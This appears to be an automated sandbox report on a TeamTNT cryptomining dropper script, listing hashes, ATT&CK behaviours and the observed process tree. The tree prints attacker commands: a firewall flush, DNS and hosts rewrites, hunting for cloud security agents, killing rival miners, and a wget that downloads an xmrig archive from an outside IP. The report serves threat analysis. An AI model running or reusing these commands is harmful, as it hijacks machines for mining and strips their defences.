Analysis
-
max time kernel
68s -
max time network
177s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
29-12-2024 23:10
General
-
Target
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
-
Size
27KB
-
MD5
0da186f3e1f8c89c5fbe5672cbdf05b6
-
SHA1
a917ab4301ab25749d6e867a1812e61b3b09df3f
-
SHA256
f82ea98d1dc5d14817c80937b91b381e9cd29d82367a2dfbde60cfb073ea4316
-
SHA512
25c6afd296b855f8d230389479b95ac079b51a084b38ef7a9a2747024fae8d4441f45b2fb45071f59835868a3b31d7fab2549244be43a09942a5fc07240f7f1d
-
SSDEEP
384:ckWWRItydlaRM07lT2wDi/Y5vWCr7Q2K3v/lts1dIxRsnJEbOU89WV/:ckWcItYlaxlT2wDGWvWCrzPoRfOPO/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 6 IoCs
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 2 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 23 IoCs
Malware often drops required files in the /tmp directory.
-
Software Deployment Tools 1 TTPs 4 IoCs
Use software deployment tools to execute code.
Processes
-
/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh"1⤵
- Modifies hosts file
- Writes DNS configuration
- Write file to user bin folder
- Writes file to tmp directory
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/pidofpidof /usr/sbin/.configure/xmrig2⤵
- Reads runtime system information
-
-
/bin/grepgrep "45.9.148.108 chimaera.cc" /etc/hosts2⤵
-
-
/bin/grepgrep chimaera /etc/hosts2⤵
-
-
/bin/grepgrep "45.9.148.108 teamtnt.red" /etc/hosts2⤵
-
-
/bin/grepgrep teamtnt /etc/hosts2⤵
-
-
/bin/grepgrep "nameserver 8.8.8.8\\|nameserver 8.8.4.4" /etc/resolv.conf2⤵
-
-
/bin/grepgrep nameserver /etc/resolv.conf2⤵
-
-
/bin/sedsed -i /nameserver/d /etc/resolv.conf2⤵
-
-
/bin/grepgrep "nameserver 8.8.8.8" /etc/resolv.conf2⤵
-
-
/bin/grepgrep "nameserver 8.8.4.4" /etc/resolv.conf2⤵
-
-
/usr/bin/apt-getapt-get update --fix-missing2⤵
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
-
-
/usr/bin/apt-getapt-get install -y bc2⤵
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
-
/usr/bin/apt-getapt-get update --fix-missing2⤵
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
- Checks CPU configuration
- Reads runtime system information
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
-
/usr/bin/apt-getapt-get install -y bc --reinstall2⤵
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
-
/bin/cpcp /usr/bin/curl /usr/sbin/C_hg_curl2⤵
- Write file to user bin folder
-
-
/bin/chmodchmod +x /usr/sbin/C_hg_curl2⤵
- File and Directory Permissions Modification
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/bin/mkdirmkdir -p /usr/sbin/.configure/2⤵
-
-
/bin/systemctlsystemctl stop account_daemons.service2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/bin/systemctlsystemctl stop moneroocean_miner.service2⤵
- Enumerates kernel/hardware configuration
-
-
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
-
-
/usr/bin/killallkillall -9 xmrigMiner2⤵
- Reads runtime system information
-
-
/bin/rmrm -rf /usr/sbin/moneroocean/2⤵
-
-
/bin/rmrm -rf /usr/bin/moneroocean/2⤵
-
-
/bin/rmrm -rf /usr/sbin/moneroocean/2⤵
-
-
/usr/bin/nprocnproc2⤵
-
-
/bin/sleepsleep 22⤵
-
-
/bin/rmrm -f "/usr/sbin/.configure/*.json"2⤵
-
-
/bin/catcat2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/usr/bin/cutcut -f1 -d.2⤵
-
-
/bin/sedsed -r "s/[^a-zA-Z0-9\\-]+/_/g"2⤵
-
-
/bin/sedsed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"debian9-armhf-20240611-en-4\",/" /usr/sbin/.configure/config.json2⤵
- Write file to user bin folder
-
-
/bin/cpcp /usr/sbin/.configure/config.json /usr/sbin/.configure/config_background.json2⤵
- Write file to user bin folder
-
-
/bin/sedsed -i "s/\"background\": *false,/\"background\": true,/" /usr/sbin/.configure/config_background.json2⤵
- Write file to user bin folder
-
-
/usr/bin/wgetwget -q http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/kuben3/i386.tar.gz -O /usr/sbin/.configure/xmrig.tar.gz2⤵
- Write file to user bin folder
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19B
MD5fe0b86955e4eb444f17f54d086580b1f
SHA1e19182dd3a1465bda3aa2e1a63067bec82dd5ad3
SHA256be102039b1dc4747490c6994ca8dc17d12d32219561f8ba23e8c0b865ac223ed
SHA5126e03176e423005c87c6c7b2ec4e90c46639d4311839a980317102a10445bc563e1c9e288605d6d5b18fadd32563c4c0ae2284f6016a54c81e5a97fa7c3cd5a26
-
Filesize
38B
MD5c7ea09d26e26605227076e0514a33038
SHA1c3f9736e9af7bd0885578859a50b205c8fa5fc8e
SHA2567e8ad76e0d200e93918ca2e93c99ff8ecd02071953bf1479819db3ac0dbb6d07
SHA51217d0088725eb9991e9eb82e8a3de0878e45e6f394bbc2ad260aa59c786ff0ad565e145e21256425d1c0abe15f3ecb402ebb0a6a5e1c2d5ba7a4d95ec93a2861f
-
Filesize
4KB
MD5ca530ff912cb1a57246c9b11a6db5dbe
SHA167fe585886fcbf5169cb1fa56f85864edc5e9f14
SHA2560db9d6dbd1c03ad2ab7b41adaabd82919dc829a28f444e9ec68173e83d4c6aa7
SHA5126c85b33f1dcb1abec7e7121f3ac45d6dd6dd75ed03f6bed956545d7e1feb9512766efee27d1015fa27d013fa73e0521d76f79b972b9d8b630ff26172609b1038
-
Filesize
4KB
MD56f5f12b9aab59646024a835c4d3b2941
SHA197d382bdeb13751bbff42442ae51413e4462499e
SHA2560292179b087ca3a9d7c5d05353692be8521dafd06f8d1e4826c10c00c56c4a2d
SHA512eb4d87fe4674942e7ec57249a0c4009f545a307258de73cd628974b6995c7393a99615b0caca20f44af731a9c63e78ffcc029eb1b37b59d1a5359d40c3681850
-
Filesize
149KB
MD520b40ccbb1ebd15d8c136f9852b3237d
SHA11e71f64883c6f097e4384bd7a95f42f1b231a19a
SHA256db8109f973860b011ac6fdc46c86043bdcec2ceeacf7ac561b2bffb788cb36ae
SHA5126b11db766e680df0b7be91997f663958198c22e24952a851c3014317eaf5b711738f2c9cf9691398259deb186c953b1c46106922b9bca0b70452d33bd8b90053